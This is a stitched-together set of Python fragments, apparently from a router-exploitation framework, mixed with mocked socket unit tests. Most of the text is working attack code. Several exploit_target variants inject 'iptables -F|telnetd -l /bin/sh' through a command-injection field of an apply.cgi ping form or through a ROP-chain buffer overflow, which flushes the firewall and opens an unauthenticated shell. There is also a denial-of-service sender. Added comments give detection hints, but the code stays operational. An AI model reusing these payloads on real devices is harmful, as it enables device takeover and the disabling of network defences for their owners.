def exploit_target(host: str, port: int, telnet_port: int) -> None:
    """
    Repeatedly attempt to exploit the target until a reverse shell is established.

    :param host: IP address of the target.
    :type host: str

    :param port: Listening port of the target.
    :type port: int

    :param telnet_port: Port to open to establish the telnet connection.
    :type telnet_port: int

    :return: Nothing. Control passes to ``tn.interact()`` once a telnet
        connection is obtained and comes back only when that session ends.
    """
    # Shell payload run on the device: flush every iptables rule, then start a
    # telnetd that hands /bin/sh to whoever connects on telnet_port. Note that
    # this is a listener on the target which the script then dials into, not a
    # reverse connection as the docstring says. Defender note: an emptied
    # firewall ruleset and a new telnet listener on a non-standard port are the
    # host-side artefacts of this payload.
    telnet_command = 'iptables -F|telnetd -l /bin/sh -p %d' % telnet_port
    # generate_exploit() is defined elsewhere in the project; it wraps the
    # command in whatever packet format this target expects.
    packet = generate_exploit(host, port, telnet_command)

    print(
        'Repeatedly throwing exploit...this may take some time. Shell will appear when it succeeds.'
    )

    # telnet_connect() returns None while nothing answers on telnet_port, so
    # the packet is re-sent until a connection comes back.
    tn = telnet_connect(host, telnet_port)
    while tn is None:
        try:
            mow.send_packet(host, port, packet, True)
        except:
            # NOTE(review): a bare except also catches KeyboardInterrupt and
            # SystemExit raised inside send_packet(), so Ctrl-C during a send
            # does not stop this loop; and with no pause between attempts a
            # persistently failing send spins at full speed.
            continue
        tn = telnet_connect(host, telnet_port)

    tn.interact()
def dos_target(host: str, port: int) -> None:
    """
    Send packet to target causing a denial of service.

    :param host: IP address of the target.
    :type host: str

    :param port: Listening port of the target.
    :type port: int

    :return: Nothing. Any exception raised by ``mow.send_packet`` propagates
        to the caller; success is not verified here.
    """
    # create_dos_packet() is defined elsewhere in the project; its payload is
    # not visible on this page.
    packet = create_dos_packet(host, port)

    # Trailing True appears to be send_packet's fire-and-forget flag (compare
    # the test_send_packet_* cases on this page): the packet is written and no
    # response is read.
    mow.send_packet(host, port, packet, True)
    def test_send_packet_fire_and_forget(self, mock_socket):
        """send_packet(..., True) opens one TCP socket, connects, and sends once.

        ``mock_socket`` presumably stands in for ``socket.socket`` via a patch
        decorator above this method; the connection object it hands out is a
        Mock, so the test generates no network traffic.
        """
        fake_conn = mock.Mock()
        mock_socket.return_value = fake_conn

        endpoint = ('1.2.3.4', 80)
        payload = b'packet'
        mow.send_packet(endpoint[0], endpoint[1], payload, True)

        # Exactly one AF_INET/SOCK_STREAM socket, one connect to the endpoint
        # and one send of the payload.
        mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
        fake_conn.send.assert_called_once_with(payload)
        fake_conn.connect.assert_called_once_with(endpoint)
def exploit_target(host: str, port: int, telnet_port: int, username: str, password: str) -> None:
    """
    Send the exploit to the target and connect to the reverse shell.

    :param host: Target IP address.
    :type host: str

    :param port: Target port.
    :type port: int

    :param telnet_port: Telnet port to open on the target.
    :type telnet_port: int

    :param username: Username used for authentication.
    :type username: str

    :param password: Password used for authentication.
    :type password: str

    :return: Nothing. Goes interactive on the telnet session when one is
        obtained, otherwise prints a failure message.
    """

    # Drop firewall rules to allow connecting to the telnet server. '|' is used because ';' and '&' are dropped when
    # present in the header.
    # The backtick wrapping relies on whatever evaluates the field on the
    # device performing command substitution (not visible here). The result is
    # a /bin/sh listener on telnet_port that this script connects to, i.e. a
    # bind shell despite the docstring. Defender note: flushed iptables chains
    # and a new telnetd on a non-standard port are the host-side artefacts.
    telnet_command = b'`iptables -F|telnetd -l /bin/sh -p %d`' % telnet_port
    # authenticate() is defined elsewhere; presumably it establishes the
    # session apply.cgi requires before the POST below is accepted.
    authenticate(host, port, username, password)

    # Form fields of the device's diagnostic (ping) action; the command rides
    # in the ip_addr field. Detection: a POST to apply.cgi whose ip_addr value
    # holds backticks or a pipe rather than an address.
    data = {
        b'ccp_act': b'set',
        b'action': b'tools_diagnostic',
        b'method': b'0',
        b'ip_addr': telnet_command,
        b'pkt_size': b'64',
        b'cnt': b'4'
    }

    # Hand-rolled form body: no percent-escaping is applied, so the shell
    # metacharacters in telnet_command reach the target verbatim.
    data = b'&'.join(b'%s=%s' % (key, value) for key, value in data.items())
    request = mow.CustomRequest(host, port, mow.POST, b'apply.cgi', data=data)
    packet = request.create_packet()
    mow.send_packet(host, port, packet, True)

    # Fixed grace period for telnetd to come up, then a single connect attempt.
    time.sleep(5)
    tn = telnet_connect(host, telnet_port)

    # If the exploit succeeded go interactive with the telnet session, otherwise report failure.
    if tn:
        tn.interact()
    else:
        print('Exploit failed, no telnet server listening at %s:%d' %
              (host, telnet_port))
    def test_send_packet_bad_block(self, mock_socket):
        """A falsy first recv() result stops reading after a single recv call.

        ``mock_socket`` presumably replaces ``socket.socket`` through a patch
        decorator above this method; the fake connection answers recv() with
        None and the test checks recv(4096) is issued exactly once.
        """
        fake_conn = mock.Mock()
        fake_conn.recv.return_value = None
        mock_socket.return_value = fake_conn

        target = ('1.2.3.4', 80)
        payload = b'packet'
        mow.send_packet(target[0], target[1], payload)

        # One socket, one connect, one send and exactly one 4096-byte recv.
        mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
        fake_conn.connect.assert_called_once_with(target)
        fake_conn.send.assert_called_once_with(payload)
        fake_conn.recv.assert_called_once_with(4096)
def exploit_target(host: str, port: int, telnet_port: int) -> None:
    """
    Repeatedly attempt to exploit the target until a reverse shell is established.

    :param host: IP address of the target.
    :type host: str

    :param port: Listening port of the target.
    :type port: int

    :param telnet_port: Port to open to establish the telnet connection.
    :type telnet_port: int

    :return: Nothing. Despite the summary this variant sends the packet only
        once, waits, then goes interactive on the telnet session.
    """
    # Shell payload run on the device: flush all iptables rules, then start a
    # telnetd serving /bin/sh on telnet_port (a listener on the target that
    # this script dials into). Defender note: an emptied firewall ruleset and
    # a new telnet listener on a non-standard port are the host-side artefacts.
    telnet_command = 'iptables -F|telnetd -l /bin/sh -p %d' % telnet_port
    # generate_exploit() is defined elsewhere in the project.
    packet = generate_exploit(host, port, telnet_command)

    # Fire-and-forget send; exceptions from send_packet() propagate here.
    mow.send_packet(host, port, packet, True)

    # Fixed grace period for telnetd to start before the single connect below.
    time.sleep(3)
    tn = telnet_connect(host, telnet_port)

    # NOTE(review): no None check here. Judging by the sibling variants on this
    # page, telnet_connect() returns None when nothing is listening, in which
    # case this line raises AttributeError instead of a clear failure message.
    tn.interact()
def exploit_target(host: str, port: int, telnet_port: int) -> None:
    """
    Send the exploit to the target and connect to the reverse shell.

    :param host: Target IP address.
    :type host: str

    :param port: Target port.
    :type port: int

    :param telnet_port: Telnet port to open on the target.
    :type telnet_port: int

    :return: Nothing. Sends once, waits, then goes interactive on the telnet
        session.
    """
    # Shell payload run on the device: flush all iptables rules, then start a
    # telnetd serving /bin/sh on telnet_port (a listener on the target that
    # this script connects to, not a reverse connection). Defender note: an
    # emptied firewall ruleset and a new telnet listener on a non-standard
    # port are the host-side artefacts.
    telnet_command = 'iptables -F|telnetd -l /bin/sh -p %d' % telnet_port
    # generate_exploit() is defined elsewhere in the project.
    packet = generate_exploit(host, port, telnet_command)

    try:
        mow.send_packet(host, port, packet, True)
    except:
        # NOTE(review): bare except swallows everything, including
        # KeyboardInterrupt, and discards the error; a failed send is
        # indistinguishable from a successful one at this point.
        pass
    # Fixed grace period for telnetd to start before the single connect below.
    time.sleep(3)
    tn = telnet_connect(host, telnet_port)

    # NOTE(review): no None check. Judging by the sibling variants on this page
    # telnet_connect() returns None when nothing is listening, so this line
    # raises AttributeError instead of reporting the failure.
    tn.interact()
    def test_send_packet_one_block(self, mock_socket):
        """A response that fits in one recv() call is returned unchanged.

        The fake connection answers the single recv() with 100 bytes; the test
        checks socket setup, a single recv(4096), and that those bytes are the
        return value of send_packet.
        """
        fake_conn = mock.Mock()
        mock_socket.return_value = fake_conn
        reply = b'a' * 100
        fake_conn.recv.return_value = reply

        target = ('1.2.3.4', 80)
        payload = b'packet'
        received = mow.send_packet(target[0], target[1], payload)

        mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
        fake_conn.connect.assert_called_once_with(target)
        fake_conn.send.assert_called_once_with(payload)
        fake_conn.recv.assert_called_once_with(4096)
        self.assertEqual(received, reply)
    def test_send_packet_multi_block(self, mock_socket):
        """Responses spanning several recv() calls are concatenated in order.

        recv() yields two full 4096-byte blocks and then a short 100-byte one;
        the test expects three recv(4096) calls and the joined bytes as the
        result.
        """
        fake_conn = mock.Mock()
        mock_socket.return_value = fake_conn
        chunks = [b'a' * 4096, b'b' * 4096, b'c' * 100]
        fake_conn.recv.side_effect = chunks

        target = ('1.2.3.4', 80)
        payload = b'packet'
        received = mow.send_packet(target[0], target[1], payload)

        mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
        fake_conn.connect.assert_called_once_with(target)
        fake_conn.send.assert_called_once_with(payload)
        # assert_called_with only inspects the last call; call_count pins the
        # total number of reads.
        fake_conn.recv.assert_called_with(4096)
        self.assertEqual(fake_conn.recv.call_count, len(chunks))
        self.assertEqual(received, b''.join(chunks))
def exploit_target(host: str, port: int, telnet_port: int, username: str, password: str) -> None:
    """
    Send the exploit to the target and connect to the reverse shell.

    :param host: Target IP address.
    :type host: str

    :param port: Target port.
    :type port: int

    :param telnet_port: Telnet port to open on the target.
    :type telnet_port: int

    :param username: Username used for authentication.
    :type username: str

    :param password: Password used for authentication.
    :type password: str

    :return: Nothing. Re-sends the packet until a telnet connection is
        obtained, then goes interactive and returns when that session ends.
    """

    # Drop firewall rules to allow connecting to the telnet server. '|' is used because ';' and '&' are dropped when
    # present in the header.
    # str here, whereas the other apply.cgi variant on this page builds the
    # command as bytes. The result on the device is a /bin/sh telnetd listener
    # on telnet_port that this script connects to (a bind shell despite the
    # docstring). Defender note: flushed iptables chains and a new telnetd on a
    # non-standard port are the host-side artefacts.
    telnet_command = '`iptables -F|telnetd -l /bin/sh -p %d`' % telnet_port
    # authenticate() is defined elsewhere; presumably it establishes the
    # session apply.cgi requires. It runs once, before the retry loop below.
    authenticate(host, port, username, password)

    # Raw addresses passed to mow.Overflow below. They are constants tied to
    # whichever firmware image this script was written against; what each one
    # refers to is not visible on this page.
    rop1 = 0x3e164
    rop2 = 0x53168
    rop3 = 0x3ca64

    system = 0x57b1c

    # mow.Overflow assembles the oversized ip_addr value; its constructor
    # arguments and add_to_stack() semantics are project-specific and not
    # visible here. Spaces in the command are swapped for ${IFS} so the
    # generated value contains no whitespace. generate() must return bytes for
    # the b'%s=%s' formatting below to work.
    overflow = mow.Overflow(0x228, 3, mow.LITTLE_ENDIAN, 0, 0x76fd5000,
                            'ping result: ')
    overflow.ra = rop1
    overflow.add_to_stack(0x3c, address=rop2)
    overflow.add_to_stack(0x34, address=rop3)
    overflow.add_to_stack(0x2c, address=system)
    overflow.add_to_stack(0x68, command=telnet_command.replace(' ', '${IFS}'))
    overflow_string = overflow.generate()

    # Same diagnostic (ping) form as the other apply.cgi variant; this time the
    # ip_addr field carries the overflow string. Detection: a POST to
    # apply.cgi whose ip_addr value is far longer than any address.
    data = {
        b'ccp_act': b'set',
        b'action': b'tools_diagnostic',
        b'method': b'0',
        b'ip_addr': overflow_string,
        b'pkt_size': b'64',
        b'cnt': b'4'
    }

    # Hand-rolled form body: no percent-escaping, so the value goes out verbatim.
    data = b'&'.join(b'%s=%s' % (key, value) for key, value in data.items())
    request = mow.CustomRequest(host, port, mow.POST, b'apply.cgi', data=data)
    packet = request.create_packet()

    # telnet_connect() returns None while nothing answers on telnet_port; the
    # packet is re-sent until a connection comes back.
    tn = telnet_connect(host, telnet_port)
    while tn is None:
        try:
            mow.send_packet(host, port, packet, True)
        except:
            # NOTE(review): a bare except also catches KeyboardInterrupt and
            # SystemExit raised inside send_packet(), so Ctrl-C during a send
            # does not stop the loop; with no pause between attempts a
            # persistently failing send spins at full speed.
            continue
        tn = telnet_connect(host, telnet_port)

    tn.interact()